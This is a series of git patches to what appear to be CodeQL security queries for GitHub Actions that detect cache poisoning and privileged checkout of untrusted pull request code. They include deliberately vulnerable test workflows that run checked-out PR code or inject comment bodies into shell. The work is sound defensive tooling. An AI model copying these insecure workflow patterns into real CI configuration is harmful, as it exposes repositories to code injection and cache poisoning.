a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797dc..a1436fd6fe37 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -43,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning of a default branch." From e8f2bc3ef69f2a7171c7442a06ffc13b920d06ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:11 +0200 Subject: [PATCH 251/707] Remove debug method --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0db8d63e6f3b..ba6430f157fc 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -295,5 +295,3 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } - -predicate test(ScalarValueLeaf f) { any() } From ddf72a2cf3c03fc38210a21a48694cf9142c826c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:24 +0200 Subject: [PATCH 252/707] Add more poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 130879a7cb6a..f65bf5fb4dc8 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -43,12 +43,19 @@ class LocalCommandExecutionRunStep extends PoisonableStep, Run { or // sh xxxx cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + or + // node xxxx + cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) ) } string getCommand() { result = cmd } } +class LocalActionUsesStep extends PoisonableStep, UsesStep { + LocalActionUsesStep() { this.getCallee().matches("./%") } +} + class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(string value | From f95a3e5298633558718b462d195a4308df1e1cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:33:06 +0200 Subject: [PATCH 253/707] Refactor eventtrigger and privileged methods Move them from Workflows to Jobs --- ql/lib/codeql/actions/Ast.qll | 7 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 173 ++++++++++++------ .../PrivilegedUntrustedCheckoutCritical.ql | 7 +- .../PrivilegedUntrustedCheckoutHigh.ql | 7 +- 4 files changed, 125 insertions(+), 69 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d6712..7d10f29af507 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -261,8 +261,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } - - predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -288,6 +286,7 @@ class Outputs extends AstNode instanceof OutputsImpl { } class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] string getPermission(string perm) { result = super.getPermission(perm) } string getAPermission() { result = super.getAPermission() } @@ -329,6 +328,10 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } + + string getATriggerEvent() { result = super.getATriggerEvent() } + Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed9..e9989bf6e932 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -64,7 +64,7 @@ private newtype TAstNode = TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or - TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or @@ -320,6 +320,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets a job within this workflow */ JobImpl getAJob() { result = this.getJob(_) } + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + /** Workflow is triggered by given trigger event */ predicate hasTriggerEvent(string trigger) { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) @@ -330,43 +333,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) } - /** Gets the permissions granted to this workflow. */ - PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - - /** Holds if the workflow is privileged. */ - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpressionImpl expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, WorkflowImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 - } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -502,7 +470,7 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { } class PermissionsImpl extends AstNodeImpl, TPermissionsNode { - YamlMapping n; + YamlMappingLikeNode n; PermissionsImpl() { this = TPermissionsNode(n) } @@ -516,11 +484,41 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } - override YamlMapping getNode() { result = n } + override YamlMappingLikeNode getNode() { result = n } + + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } - string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } - string getAPermission() { result = this.getPermission(_) } + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -633,37 +631,87 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the workflow is privileged. */ + /** Holds if the job is privileged. */ predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() + or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or // the job has an explicit write permission - this.getPermissions().getAPermission() = "write" + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() or + // neither the job nor the workflow have permissions but the job has a privileged trigger + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.hasPrivilegedTrigger() + } + + private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) - or - // the effective permissions have write access + } + + private predicate hasExplicitWritePermission() { + // the job has an explicit write permission + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and // We cannot trust the permissions for pull_request events since they depend on the - // location of the head branch + // provenance of the head branch (local vs fork) not trigger.trim() = "pull_request" and - ( - secrets_source.trim().toLowerCase() = "actions" or - perms.toLowerCase().matches("%write%") - ) + perms.toLowerCase().matches("%write%") ) + } + + private predicate hasPrivilegedTrigger() { + // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. + // The Job is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or - // The job has no expliclit permission, but the enclosing workflow is privileged - not exists(this.getPermissions()) and - not exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) and - // The enclosing workflow is privileged - this.getEnclosingWorkflow().isPrivileged() + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, JobImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getEnclosingJob() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. */ + string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 } /** Gets the runs-on field of the job. */ @@ -825,11 +873,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + if u.getValue().matches("./%") + then result = u.getValue() + else + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 5c0528c45518..1181cd1e7559 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index e45075552ab2..bf2cf129fbf5 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From 2d09d1e6d88d0fa9198f3274505d02567acb5f45 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:34:30 +0200 Subject: [PATCH 254/707] Fix alert text --- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 2de07ec17bd1..e02b64e9ec5a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -37,5 +37,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, + "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 44377acb0811775441b855ed214132ff6d283813 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:06 +0200 Subject: [PATCH 255/707] Improve Cache Poisoning quer --- ql/src/Security/CWE-349/CachePoisoning.ql | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797dc..12be71af43ee 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,8 +16,10 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout, Step s where + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() and // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? @@ -37,10 +39,13 @@ where ( // The job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() instanceof CacheWritingStep + j.getAStep() = s and + s instanceof CacheWritingStep or // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() = s and + s instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Untrusted checked-out code may lead to cache poisoning on step $@.", s, + s.toString() From d2e9411e129380691ebacb645a1fbd74bea3c572 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:17 +0200 Subject: [PATCH 256/707] Update and new tests --- .../CWE-349/.github/workflows/test1.yml | 1 + .../CWE-349/.github/workflows/test10.yml | 12 +++++++++ .../CWE-349/.github/workflows/test11.yml | 24 +++++++++++++++++ .../CWE-349/.github/workflows/test12.yml | 21 +++++++++++++++ .../CWE-349/.github/workflows/test2.yml | 2 ++ .../CWE-349/.github/workflows/test3.yml | 2 ++ .../CWE-349/.github/workflows/test4.yml | 4 +++ .../CWE-349/.github/workflows/test5.yml | 2 ++ .../CWE-349/.github/workflows/test6.yml | 1 + .../CWE-349/.github/workflows/test7.yml | 1 + .../CWE-349/.github/workflows/test8.yml | 26 ++++++++++++++++--- .../CWE-349/.github/workflows/test9.yml | 2 +- .../Security/CWE-349/CachePoisoning.expected | 14 +++++----- .../CachePoisoningByCodeInjection.expected | 3 ++- ...ivilegedUntrustedCheckoutCritical.expected | 1 + .../PrivilegedUntrustedCheckoutHigh.expected | 1 - 16 files changed, 104 insertions(+), 13 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml index 75e03886d48e..55efe8e9fec9 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -4,6 +4,7 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest steps: - uses: xt0rted/pull-request-comment-branch@v2 diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml new file mode 100644 index 000000000000..eba5e79229b4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: write-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml new file mode 100644 index 000000000000..3849d92cbcca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml new file mode 100644 index 000000000000..e2c435af62de --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml index 6a6595d929ee..eb6373a406eb 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: read-all + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml index 2c684b6a02d5..fa56d074936b 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: {} + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml index b5ea127ebd32..03eb9e99f0f2 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -2,9 +2,13 @@ name: Cache Poisoning on: pull_request_target +permissions: + contents: read + jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml index 9bc6cc980562..b7454d0a0dc1 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -5,6 +5,8 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: + contents: read steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml index b5ef835210bc..2fa898982bcd 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml index d0ff8c180fe2..be83f83cf30b 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml index 68d3f7f75ac4..05f8e4a067a1 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -5,15 +5,33 @@ on: jobs: pr-comment: runs-on: ubuntu-latest + permissions: read-all steps: - uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - uses: actions/checkout@v3 - if: success() with: ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison - - run: | - ./checkedout/poison + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml index 3b646b795ac2..9f19634abc92 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -4,8 +4,8 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest - permissions: {} steps: - run: | echo ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 67cdea32c5d1..841a3ee40712 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,6 +1,8 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 5f244aa2faf8..60c25e1cd92a 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,6 +1,7 @@ edges nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected index ff65e1658125..ca86bac14f0e 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected @@ -1,3 +1,4 @@ +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915fc..a40ab1fa771b 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,3 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | 